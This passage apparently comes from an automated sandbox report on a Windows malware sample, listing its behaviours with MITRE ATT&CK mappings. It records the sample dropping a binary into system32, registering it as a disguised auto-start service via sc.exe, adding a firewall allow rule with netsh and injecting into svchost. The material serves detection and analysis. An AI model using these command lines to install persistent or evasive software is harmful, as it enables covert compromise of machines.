1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000120020116600fce2120080f49077000066000000000089f49077e2dd6db90200000070e312006ce3120064e2120068e2120018e4120095e1a67754011700c0e21200c83a9a7734e31200d58c927770e3120004e3120042a49077a8029a7744e31200d2f49077080000006ef5907744f590775adc6db90200000070aacf6e0000130026bbcf6e18e31200020000000000130070aacf6e48e3120042a49077a8029a778ce3120010a9cf6e08000000e6a8cf6e69c86dbe0200000070aacf6e0000130026bbcf6e541166002011660058e312008050db6e18e41200f9f2d36e0d83b0d0 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000b1c47f250300000044e56001f810dcbf701700008ce56001c0e46001590000000300000048e4600150e4600118e66001d0bba16acc641fd4feffffff98e56001bfe5a06ab1c47f2598e56001cce5a06a060000000000d96a01000000dfe5a06a3333ff040600000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e56001000000008e00000044e66001feffffffcce56001cf00ab77d600ab7788f8dd768e0000004700000044e6600100000000a0e560010000000008e66001 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008912debf44de60016d822176f4832d0004010000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000370031006500330035003100380036006600660033006600330034003700320063003100610033003300330034003300330062003600640062003900620030006400390065003700660039003400360066006100650066003300650031003900370030002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2baa77b4d5dd76d8eb4376ac0125000000250000000000000000000100f700cc000000000000000000000000000000000000000200f200cc00000000000000000000000870250000000000200000000000000000000000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000250060cc2f00000000003e00003e340000c088ce2f0090e22f0088402d00f0010000000025000400000060cc2f00acee60010464aa7738012500e063aa77e8f3dd76000000000000250068cc2f006dd186777f621cb86cae4d760000000000000000f401000090e22f00d82f25000100000000002500500125000c00000068cc2f00d82f25000200000218000000ab21008a820000000000000000000000030000004cee6001820000007f07000000000000ab21008a02000000c0758e7790e22f0000000000c0758e7768ee6001e830250000000000d82f2500c0ee6001ff2baa77 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000523aecd00300000044e56001f810dcbf041700008ce56001c0e460015b0000000300000048e4600150e4600118e66001d0bba16acc641fd4feffffff98e56001bfe5a06a523aecd098e56001cce5a06a820500000000d96a01000000dfe5a06a3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002500d0ef2f00000000003e00003e340000c0f8f12f0070f52f0018cf2f00f00100000000250004000000d0ef2f00acee60010464aa7738012500e063aa77e8f3dd760000000000002500d8ef2f006dd186777f621cb86cae4d7600000000000000000001000070f52f00d82f25000100000000002500500125000c000000d8ef2f00d82f2500020000021800000094000094820000000000000000000000030000004cee6001820000001400000000000000372f001802000000c0758e773086300000000000c0758e7768ee6001fc2f250000000000d82f2500c0ee6001ff2baa77 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000e234f7dd0300000044e56001f810dcbff81700008ce56001c0e460015b0000000300000048e4600150e4600118e66001d0bba16acc641fd4feffffff98e56001bfe5a06ae234f7dd98e56001cce5a06a820500000000d96a01000000dfe5a06a3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"IsWow64Process\" with parameter \"5796\" - (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"mojpivf.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00003048)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00003048)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000fa95e939154700000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000482eee672434ee670000000000000000\" - (UID: 00000000-00005992)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"3461d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"2423808\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"mojpivf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"mojpivf.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00003048)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003048)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"mojpivf.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TPXHOIKO\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mojpivf.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\mojpivf.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" has section name .text with entropy \"6.630102803682182\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" has section name .text with entropy \"7.972855291312212\"\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970\" has section name .reloc with entropy \"6.221496050028631\"\n \"mojpivf.exe\" has section name .text with entropy \"6.630102803682182\"\n \"mojpivf.exe\" has section name .text with entropy \"7.972855291312212\"\n \"mojpivf.exe\" has section name .reloc with entropy \"6.221496050028631\"\n \"DISMHOST.EXE.67EE4FF1.bin\" has section name .text with entropy \"6.114767813379059\"\n \"DISMHOST.EXE.67EE4FF1.bin\" has section name .data with entropy \"6.4458000319803865\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00005796)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00005796)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" (UID: 00000000-00005796)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005924)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\mojpivf.exe\" %WINDIR%\\\\system32\\\\tpxhoiko\\\\\" (UID: 00000000-00005856)\n Spawned process \"sc.exe\" with commandline \"create tpxhoiko binPath= \"%WINDIR%\\\\system32\\\\tpxhoiko\\\\mojpivf.exe /d\\\\\"C:\\\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00006140)\n Spawned process \"sc.exe\" with commandline \"description tpxhoiko \"wifi internet conection\"\" (UID: 00000000-00006016)\n Spawned process \"sc.exe\" with commandline \"start tpxhoiko\" (UID: 00000000-00004364)\n Spawned process \"mojpivf.exe\" with commandline \"/d\"C:\\\\8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\"\" (UID: 00000000-00002772)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00003048)\n Spawned process \"svchost.exe\" (UID: 00000000-00005992)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 560)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 560)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 560)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 556)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 252)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 252)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 252)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"mojpivf.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mojpivf.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mojpivf.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"mojpivf.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"8a0cabf213753b71e35186ff3f3472c1a333433b6db9b0d9e7f946faef3e1970.exe\" allocated memory in 